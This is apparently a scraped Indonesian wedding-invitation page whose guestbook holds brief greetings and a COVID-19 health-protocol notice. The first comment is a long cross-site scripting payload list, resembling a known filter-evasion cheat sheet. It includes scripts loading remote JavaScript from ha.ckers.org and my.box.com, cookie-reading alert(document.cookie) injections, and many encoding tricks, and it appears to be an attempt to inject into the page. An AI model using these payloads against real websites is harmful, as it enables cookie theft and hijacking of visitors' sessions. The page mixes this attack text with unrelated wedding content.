HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;”&gt; &lt;HEAD&gt;&lt;META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7”&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- &lt;SCRIPT a=”&gt;” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT =”&gt;” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=”&gt;” ‘’ SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT ”a=’&gt;’” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=`&gt;` SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=”&gt;’&gt;” SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;SCRIPT&gt;document&#46;write(”&lt;SCRI”);&lt;/SCRIPT&gt;PT SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;A HREF=”http&#58;//66&#46;102&#46;7&#46;147/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//1113982867/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//0102&#46;0146&#46;0007&#46;00000223/”&gt;XSS&lt;/A&gt; &lt;A HREF=”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/”&gt;XSS&lt;/A&gt; &lt;A HREF=”//www&#46;google&#46;com/”&gt;XSS&lt;/A&gt; &lt;A HREF=”//google”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//ha&#46;ckers&#46;org@google”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//google&#58;ha&#46;ckers&#46;org”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//google&#46;com/”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//www&#46;google&#46;com&#46;/”&gt;XSS&lt;/A&gt; &lt;A HREF=”javascript&#058;document&#46;location=’http&#58;//www&#46;google&#46;com/’”&gt;XSS&lt;/A&gt; &lt;A HREF=”http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/”&gt;XSS&lt;/A&gt; &lt; %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &lt; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; x3c x3C u003c u003C &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; &lt;IMG SRC=”javascript&#058;alert(‘XSS’)” &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; &lt;&lt;SCRIPT&gt;alert(”XSS”);//&lt;&lt;/SCRIPT&gt; &lt;SCRIPT/SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|&#93;^`=alert(”XSS”)&gt; &lt;SCRIPT/XSS SRC=”http&#58;//ha&#46;ckers&#46;org/xss&#46;js”&gt;&lt;/SCRIPT&gt; &lt;IMG SRC=” javascript&#058;alert(‘XSS’);”&gt; perl -e ‘print ”&lt;SCR0IPT&gt;alert(”XSS”)&lt;/SCR0IPT&gt;”;’ &gt; out perl -e ‘print ”&lt;IMG SRC=java0script&#058;alert(”XSS”)&gt;”;’ &gt; out &lt;IMG SRC=”jav&#x0D;ascript&#058;alert(‘XSS’);”&gt; &lt;IMG SRC=”jav&#x0A;ascript&#058;alert(‘XSS’);”&gt; &lt;IMG SRC=”jav&#x09;ascript&#058;alert(‘XSS’);”&gt; &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt; &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; &lt;IMG ”””&gt;&lt;SCRIPT&gt;alert(”XSS”)&lt;/SCRIPT&gt;”&gt; &lt;IMG SRC=`javascript&#058;alert(”RSnake says, ‘XSS’”)`&gt; &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; &lt;IMG SRC=JaVaScRiPt&#058;alert(‘XSS’)&gt; &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt; &lt;IMG SRC=”javascript&#058;alert(‘XSS’);”&gt; &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; ‘’;! — ”&lt;XSS&gt;=&{()} ‘;alert(String&#46;fromCharCode(88,83,83))//’;alert(String&#46;fromCharCode(88,83,83))//”;alert(String&#46;fromCharCode(88,83,83))//”;alert(String&#46;fromCharCode(88,83,83))// — &gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘’;! — “<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=javascrscriptipt:alert(‘XSS’)> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=” &#14; javascript:alert(‘XSS’);”> <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js”></SCRIPT> <SCRIPT/SRC=”http://ha.ckers.org/xss.js”></SCRIPT> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> ”;alert(‘XSS’);// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”> <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> <DIV STYLE=”background-image:00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029'0029"> <DIV STYLE=”width: expression(alert(‘XSS’));”> <STYLE>@import’javascript:alert(“XSS”)’;</STYLE> <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”> <XSS STYLE=”xss:expression(alert(‘XSS’))”> exp/*<A STYLE=’noxss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’> <EMBED SRC=”http://ha.ckers.org/xss.swf” AllowScriptAccess=”always”></EMBED> a=”get”;b=”URL(ja””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);”)”;eval(a+b+c+d+e); <SCRIPT SRC=”http://ha.ckers.org/xss.jpg”></SCRIPT> <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”></BODY></HTML> <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js”></SCRIPT> <form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION <form><button formaction=”javascript:alert(123)”>crosssitespt <frameset onload=alert(123)> <! — <img src=” →<img src=x onerror=alert(123)//”> <style><img src=”</style><img src=x onerror=alert(123)//”> <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> <embed src=”javascript:alert(1)”> <? foo=”><script>alert(1)</script>”> <! foo=”><script>alert(1)</script>”> </ foo=”><script>alert(1)</script>”> <script>({0:#0=alert/#0#/#0#(123)})</script> <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script> <script src=”#”>{alert(1)}</script>;1 <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script> <svg xmlns=”#”><script>alert(1)</script></svg> <svg onload=”javascript:alert(123)” xmlns=”#”></svg> <iframe xmlns=”#” src=”javascript:alert(1)”></iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> “><ScRiPt>alert(document.cookie)</script> “><<script>alert(document.cookie);//<</script> foo<script>alert(document.cookie)</script> <scr<script>ipt>alert(document.cookie)</scr</script>ipt> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo’; alert(document.cookie);//’; </script><script >alert(document.cookie)</script> <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert(’XSS’)> <script>alert(1)</script> “><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> <video src=1 onerror=alert(1)> <audio src=1 onerror=alert(1)>
07.png
d
d
07.png
Suhada
sds
07.png
Suhada
Haloo
07.png
Suhada
Haloo
07.png
Suhada
Haloo
07.png
fg
fg
07.png
kita
banyak banyajk sabar welcome to the jungle
07.png
Duta
Samawa
07.png
Iis
Samawa
07.png
Putri
Samawa yaa
07.png
Siti
Semoga Sakinah Mawaddah wa Rahmah 😍
07.png
Ted
Tes

Jangan ragu untuk datang, kami sudah berkoordinasi dengan semua pihak terkait pencegahan penularan COVID-19. Acara kami akan mengikuti segala prosedur protokol kesehatan untuk mencegah penularan COVID-19. So, don't be panic, we look forward to seeing you there!

Tamu undangan wajib
menggunakan masker.

Jaga jarak antar orang
minimal sekitar 1 meter.

Suhu tubuh normal
(dibawah 37,5°C)

Cuci tangan menggunakan air dan sabun atau menggunakan hand sanitizer.

Bagi para tamu undangan diharapkan mengikuti protokol pencegahan COVID-19.